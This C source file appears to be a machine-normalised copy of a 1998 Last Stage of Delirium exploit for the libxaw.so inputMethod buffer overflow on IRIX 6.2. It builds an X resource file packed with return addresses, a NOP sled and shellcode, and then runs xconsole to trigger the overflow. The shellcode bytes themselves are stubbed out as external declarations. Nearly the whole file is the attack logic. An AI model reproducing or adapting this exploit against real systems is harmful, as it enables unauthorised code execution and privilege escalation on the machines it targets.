
typedef unsigned long size_t;
typedef long intptr_t; typedef unsigned long uintptr_t;
typedef long scalar_t__;

typedef int bool;
 int ADRNUM ;
 int NOPNUM ;
 int O_CREAT ;
 int O_WRONLY ;
 int PCHNUM ;
 int close (int) ;
 int execle (char*,char*,char*,char*,int ,char**) ;
 int exit (int) ;
 scalar_t__ jump ;
 int * nop ;
 int open (char*,int,int) ;
 int printf (char*,...) ;
 char* shellcode ;
 int strcat (char*,char*) ;
 int strcpy (char*,char*) ;
 int strlen (char*) ;
 unsigned long stub1 () ;
 unsigned long stub2 () ;
 int write (int,char*,int) ;

main(int argc,char **argv){
    char buffer[10000],adr[4],pch[4],*b,*envp[2];
    int i,fd;

    printf("copyright LAST STAGE OF DELIRIUM nov 1998 poland  //lsd-pl.net/\n");
    printf("libxaw.so inputmethod for irix 6.2 IP:17,19,20,21,22\n\n");

    if(argc!=2){
        printf("usage: %s xserver:display\n",argv[0]);
        exit(-1);
    }

    *((unsigned long*)adr)=(*(unsigned long(*)())jump)()+8300+1000+200+12976;
    *((unsigned long*)pch)=(*(unsigned long(*)())jump)()+8300+500+200+32732;

    envp[0]="XENVIRONMENT=resource";
    envp[1]=0;

    strcpy(buffer,"*text*international:    true\n");
    strcat(buffer,"*shellext*inputMethod:  ");
    b=buffer+strlen(buffer);
    for(i=0;i<PCHNUM;i++) *b++=pch[i%4];
    for(i=0;i<ADRNUM;i++) *b++=adr[i%4];
    for(i=0;i<NOPNUM;i++) *b++=nop[i%4];
    for(i=0;i<strlen(shellcode);i++) *b++=shellcode[i];
    *b++='\n';

    fd=open("resource",O_CREAT|O_WRONLY,0666);
    write(fd,buffer,strlen(buffer));
    close(fd);

    execle("/usr/bin/X11/xconsole","lsd","-display",argv[1],0,envp);
}
